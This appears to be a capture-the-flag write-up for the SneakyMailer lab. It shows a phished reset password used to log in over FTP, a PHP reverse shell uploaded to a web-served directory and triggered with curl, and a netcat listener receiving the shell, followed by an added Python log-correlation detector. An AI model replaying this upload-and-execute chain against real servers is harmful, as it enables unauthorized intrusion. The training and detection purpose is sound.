Arbitrary File Upload
A list of usernames and emails was discovered during web enumeration, which led to compromising an email account through a phishing campaign. The user behind the compromised email had requested a password reset, and I was able to authenticate to the FTP server with the reset credential. The FTP server, it turned out, had a directory serving the web root of dev.sneakycorp.htb.
Here, I will gain a foothold on the target system by placing a reverse shell in the dev directory of the FTP server, which mirrors/serves dev.sneakycorp.htb.
┌──(kali㉿kali)-[~/archive/htb/labs/sneakymailer]
└─$ ftp $IP
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
name (10.10.10.197:kali): developer
331 Please specify the password.
password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd dev
250 Directory successfully changed.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||9821|)
150 Ok to send data.
100% |*******************************************************************************************| 9284 91.27 mib/s 00:00 ETA
226 Transfer complete.
9284 bytes sent in 00:00 (149.87 KiB/s)
Uploading the payload to the dev directory of the FTP server
┌──(kali㉿kali)-[~/archive/htb/labs/sneakymailer]
└─$ curl -s 'http://dev.sneakycorp.htb/shell.php'
Triggering the payload
┌──(kali㉿kali)-[~/archive/htb/labs/sneakymailer]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.197] 34724
socket: Shell has connected! PID: 9912
whoami
www-data
hostname
sneakymailer
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.197 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb9:f04c prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:f04c prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:f0:4c txqueuelen 1000 (Ethernet)
RX packets 3047219 bytes 575460458 (548.8 MiB)
RX errors 0 dropped 10 overruns 0 frame 0
TX packets 3038105 bytes 1122585820 (1.0 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 176887 bytes 20039480 (19.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 176887 bytes 20039480 (19.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Initial foothold established on the target system as the www-data user via arbitrary file upload.
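The chain above leaves two traces a defender can correlate: a vsftpd upload of a web-executable file into a directory the web server also serves, followed by an HTTP request for that same file. The following detection check is an added example, not part of the original writeup; the log lines are constructed, the vsftpd line format assumes vsftpd's default (non-xferlog) log style, the web log assumes Apache combined format, and the FTP-directory-to-vhost mapping is a hypothetical setting for this host.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not taken from the original page).
VSFTPD_LOG = """\
Sat Jul 11 10:01:12 2020 [pid 9812] [developer] OK LOGIN: Client "10.10.14.4"
Sat Jul 11 10:01:30 2020 [pid 9814] [developer] OK UPLOAD: Client "10.10.14.4", "/dev/shell.php", 9284 bytes, 149.87Kbyte/sec
Sat Jul 11 10:02:05 2020 [pid 9816] [developer] OK UPLOAD: Client "10.10.14.4", "/dev/notes.txt", 120 bytes, 10.00Kbyte/sec
"""
WEB_LOG = """\
10.10.14.4 - - [11/Jul/2020:10:01:45 +0000] "GET /shell.php HTTP/1.1" 200 0 "-" "curl/7.68.0"
10.10.14.4 - - [11/Jul/2020:10:01:50 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "curl/7.68.0"
"""
# Extensions the web server would execute rather than serve as static content.
EXEC_EXT = {".php", ".phtml", ".phar", ".php5", ".php7"}
# FTP directories that double as web document roots (assumed mapping for this host).
FTP_WEBROOTS = {"/dev/": "dev.sneakycorp.htb"}

UPLOAD_RE = re.compile(r'\[(?P<user>[^\]]+)\] OK UPLOAD: Client "(?P<ip>[^"]+)", "(?P<path>[^"]+)"')
REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<uri>\S+)')

def risky_uploads(vsftpd_log):
    """Return uploads of web-executable files into an FTP dir that is a web root."""
    hits = []
    for line in vsftpd_log.splitlines():
        m = UPLOAD_RE.search(line)
        if not m:
            continue
        path = m.group("path")
        ext = path[path.rfind("."):].lower() if "." in path else ""
        for prefix, vhost in FTP_WEBROOTS.items():
            if path.startswith(prefix) and ext in EXEC_EXT:
                hits.append({"user": m.group("user"), "ip": m.group("ip"), "path": path,
                             "uri": "/" + path[len(prefix):], "vhost": vhost})
    return hits

def correlate(vsftpd_log, web_log):
    """Flag risky uploads that were then requested over HTTP (likely executed)."""
    requested = defaultdict(set)
    for line in web_log.splitlines():
        m = REQ_RE.match(line)
        if m:
            requested[m.group("uri").split("?")[0]].add(m.group("ip"))
    alerts = []
    for up in risky_uploads(vsftpd_log):
        if up["uri"] in requested:
            alerts.append({**up, "requested_by": sorted(requested[up["uri"]])})
    return alerts
```

An upload that is flagged but never requested is still worth reviewing; the correlated case is the one that warrants an immediate response, and the root fix is to not let an FTP-writable directory be a web root at all.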